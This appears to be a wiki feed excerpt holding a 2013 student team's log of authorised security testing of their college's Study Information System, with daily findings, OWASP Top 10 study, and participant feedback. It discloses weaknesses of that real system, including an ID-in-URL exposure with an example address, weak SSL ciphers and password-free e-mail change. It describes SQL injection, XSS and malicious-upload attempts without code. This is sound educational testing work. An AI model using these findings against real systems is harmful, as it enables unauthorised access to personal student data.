** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Not so much free time T.T&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Accommodation&lt;br /&gt;
** The equipment we used&lt;br /&gt;
** The capabilities and expertise of the professors&lt;br /&gt;
** The overall quality of teaching&lt;br /&gt;
** The expected learning outcomes&lt;br /&gt;
** The activities besides the general course&lt;br /&gt;
** Friendly environment&lt;br /&gt;
** Working in teams. Thanks guys!&lt;br /&gt;
** Free water&lt;br /&gt;
** Tasty food&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** To long working hours&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Working in teams.&lt;br /&gt;
** Meeting new people.&lt;br /&gt;
** Seeing new places.&lt;br /&gt;
** Learning new things.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Too long studying/working days.&lt;br /&gt;
** Brainstorming after whole day of lectures.&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62413</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62413"/>
		<updated>2013-04-05T08:39:51Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Feedback from Tomas Lepistö */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Discussion about today&#039;s plans.&lt;br /&gt;
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).&lt;br /&gt;
* Every member wrote a feedback to Wiki page&lt;br /&gt;
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)&lt;br /&gt;
* IP summarisation.&lt;br /&gt;
* Farewell party at St. Patrick&#039;s.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Farewell party, sleep well and start trip to home! :)&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final documentation&#039;&#039;&#039;&lt;br /&gt;
** Can be found in Google Drive (link will be here soon).&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** Googeled a lot :)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feedback==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time. I think that it is very good to participate in multicultural group, where all the participants are from different countries.&lt;br /&gt;
I did not like that we had to sit so much in lectures. :) And from time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don&#039;t know the purpose yet, but you will find it out in the future.&lt;br /&gt;
&lt;br /&gt;
I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.&lt;br /&gt;
&lt;br /&gt;
I enjoyed out-of-schedule activities. For example, I liked visiting TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling &amp;quot;competition&amp;quot; and it was fun!&lt;br /&gt;
&lt;br /&gt;
